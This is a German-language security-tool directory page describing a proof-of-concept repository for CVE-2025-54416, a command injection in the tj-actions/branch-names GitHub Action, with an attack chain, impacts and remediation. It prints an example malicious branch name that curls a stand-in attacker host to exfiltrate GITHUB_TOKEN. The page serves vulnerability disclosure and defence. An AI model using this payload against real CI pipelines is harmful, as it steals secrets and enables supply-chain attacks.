Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
atlas-tj-actions-poc — PoC für CVE-2025-54416 tj-actions/branch-names Befehlsinjektion | Kitploit
Tools/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
SchwachstellenanalyseExploitationDatenexfiltrationCommand and ControlLieferkettensicherheitLernen & Bildung
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

PoC für CVE-2025-54416 tj-actions/branch-names Befehlsinjektion

Repository anzeigen
13vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-54416: tj-actions/branch-names Befehlsinjektion PoC

Dieses Repository demonstriert CVE-2025-54416, eine kritische Befehlsinjektions-Schwachstelle in tj-actions/branch-names, die über 5.000 öffentliche Repositories betrifft.

Schwachstelle

Die GitHub Action tj-actions/branch-names (Versionen <= 8.2.1) verwendet unsicheres eval printf "%s", wodurch nach ordnungsgemäßer Bereinigung erneut Befehlsinjektionsrisiken eingeführt werden.

# Verwundbares Codemuster in tj-actions/branch-names:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

Angriffskette

  1. Ein Angreifer erstellt einen Branch mit einem bösartigen Namen, der Shell-Befehle enthält
  2. Der Workflow des Opfers verwendet tj-actions/[email protected], um den Branchnamen zu extrahieren
  3. Der extrahierte Branchname (mit der Payload des Angreifers) wird in nachfolgenden Shell-Befehlen verwendet
  4. Der Befehl wird im Kontext des CI-Runners mit den Privilegien des Runners ausgeführt
  5. Geheimnisse (AWS-Schlüssel, GITHUB_TOKEN, usw.) werden exfiltriert

Beispiel-Payload

Branchname: main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

Wenn der Workflow ausgeführt wird:

echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
# Tatsächliche Ausgabe: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
# Der $(...) wird von der Shell ausgewertet, wodurch GITHUB_TOKEN exfiltriert wird

Auswirkungen

  • Diebstahl sensibler Geheimnisse (AWS-Schlüssel, API-Tokens, GITHUB_TOKEN)
  • Unautorisierte Codeänderungen
  • Bösartige Image-Pushes in Produktionsregistries
  • Lieferkettenangriffe über kompromittierte CI/CD-Pipelines

Behebung

Aktualisieren Sie auf tj-actions/branch-names@v9 oder neuer, das eval printf "%s" durch sichere printf-Aufrufe ersetzt.

Referenzen

  • GitHub Advisory GHSA-gq52-6phf-x2r6
  • CVE-2025-54416
Tool herunterladen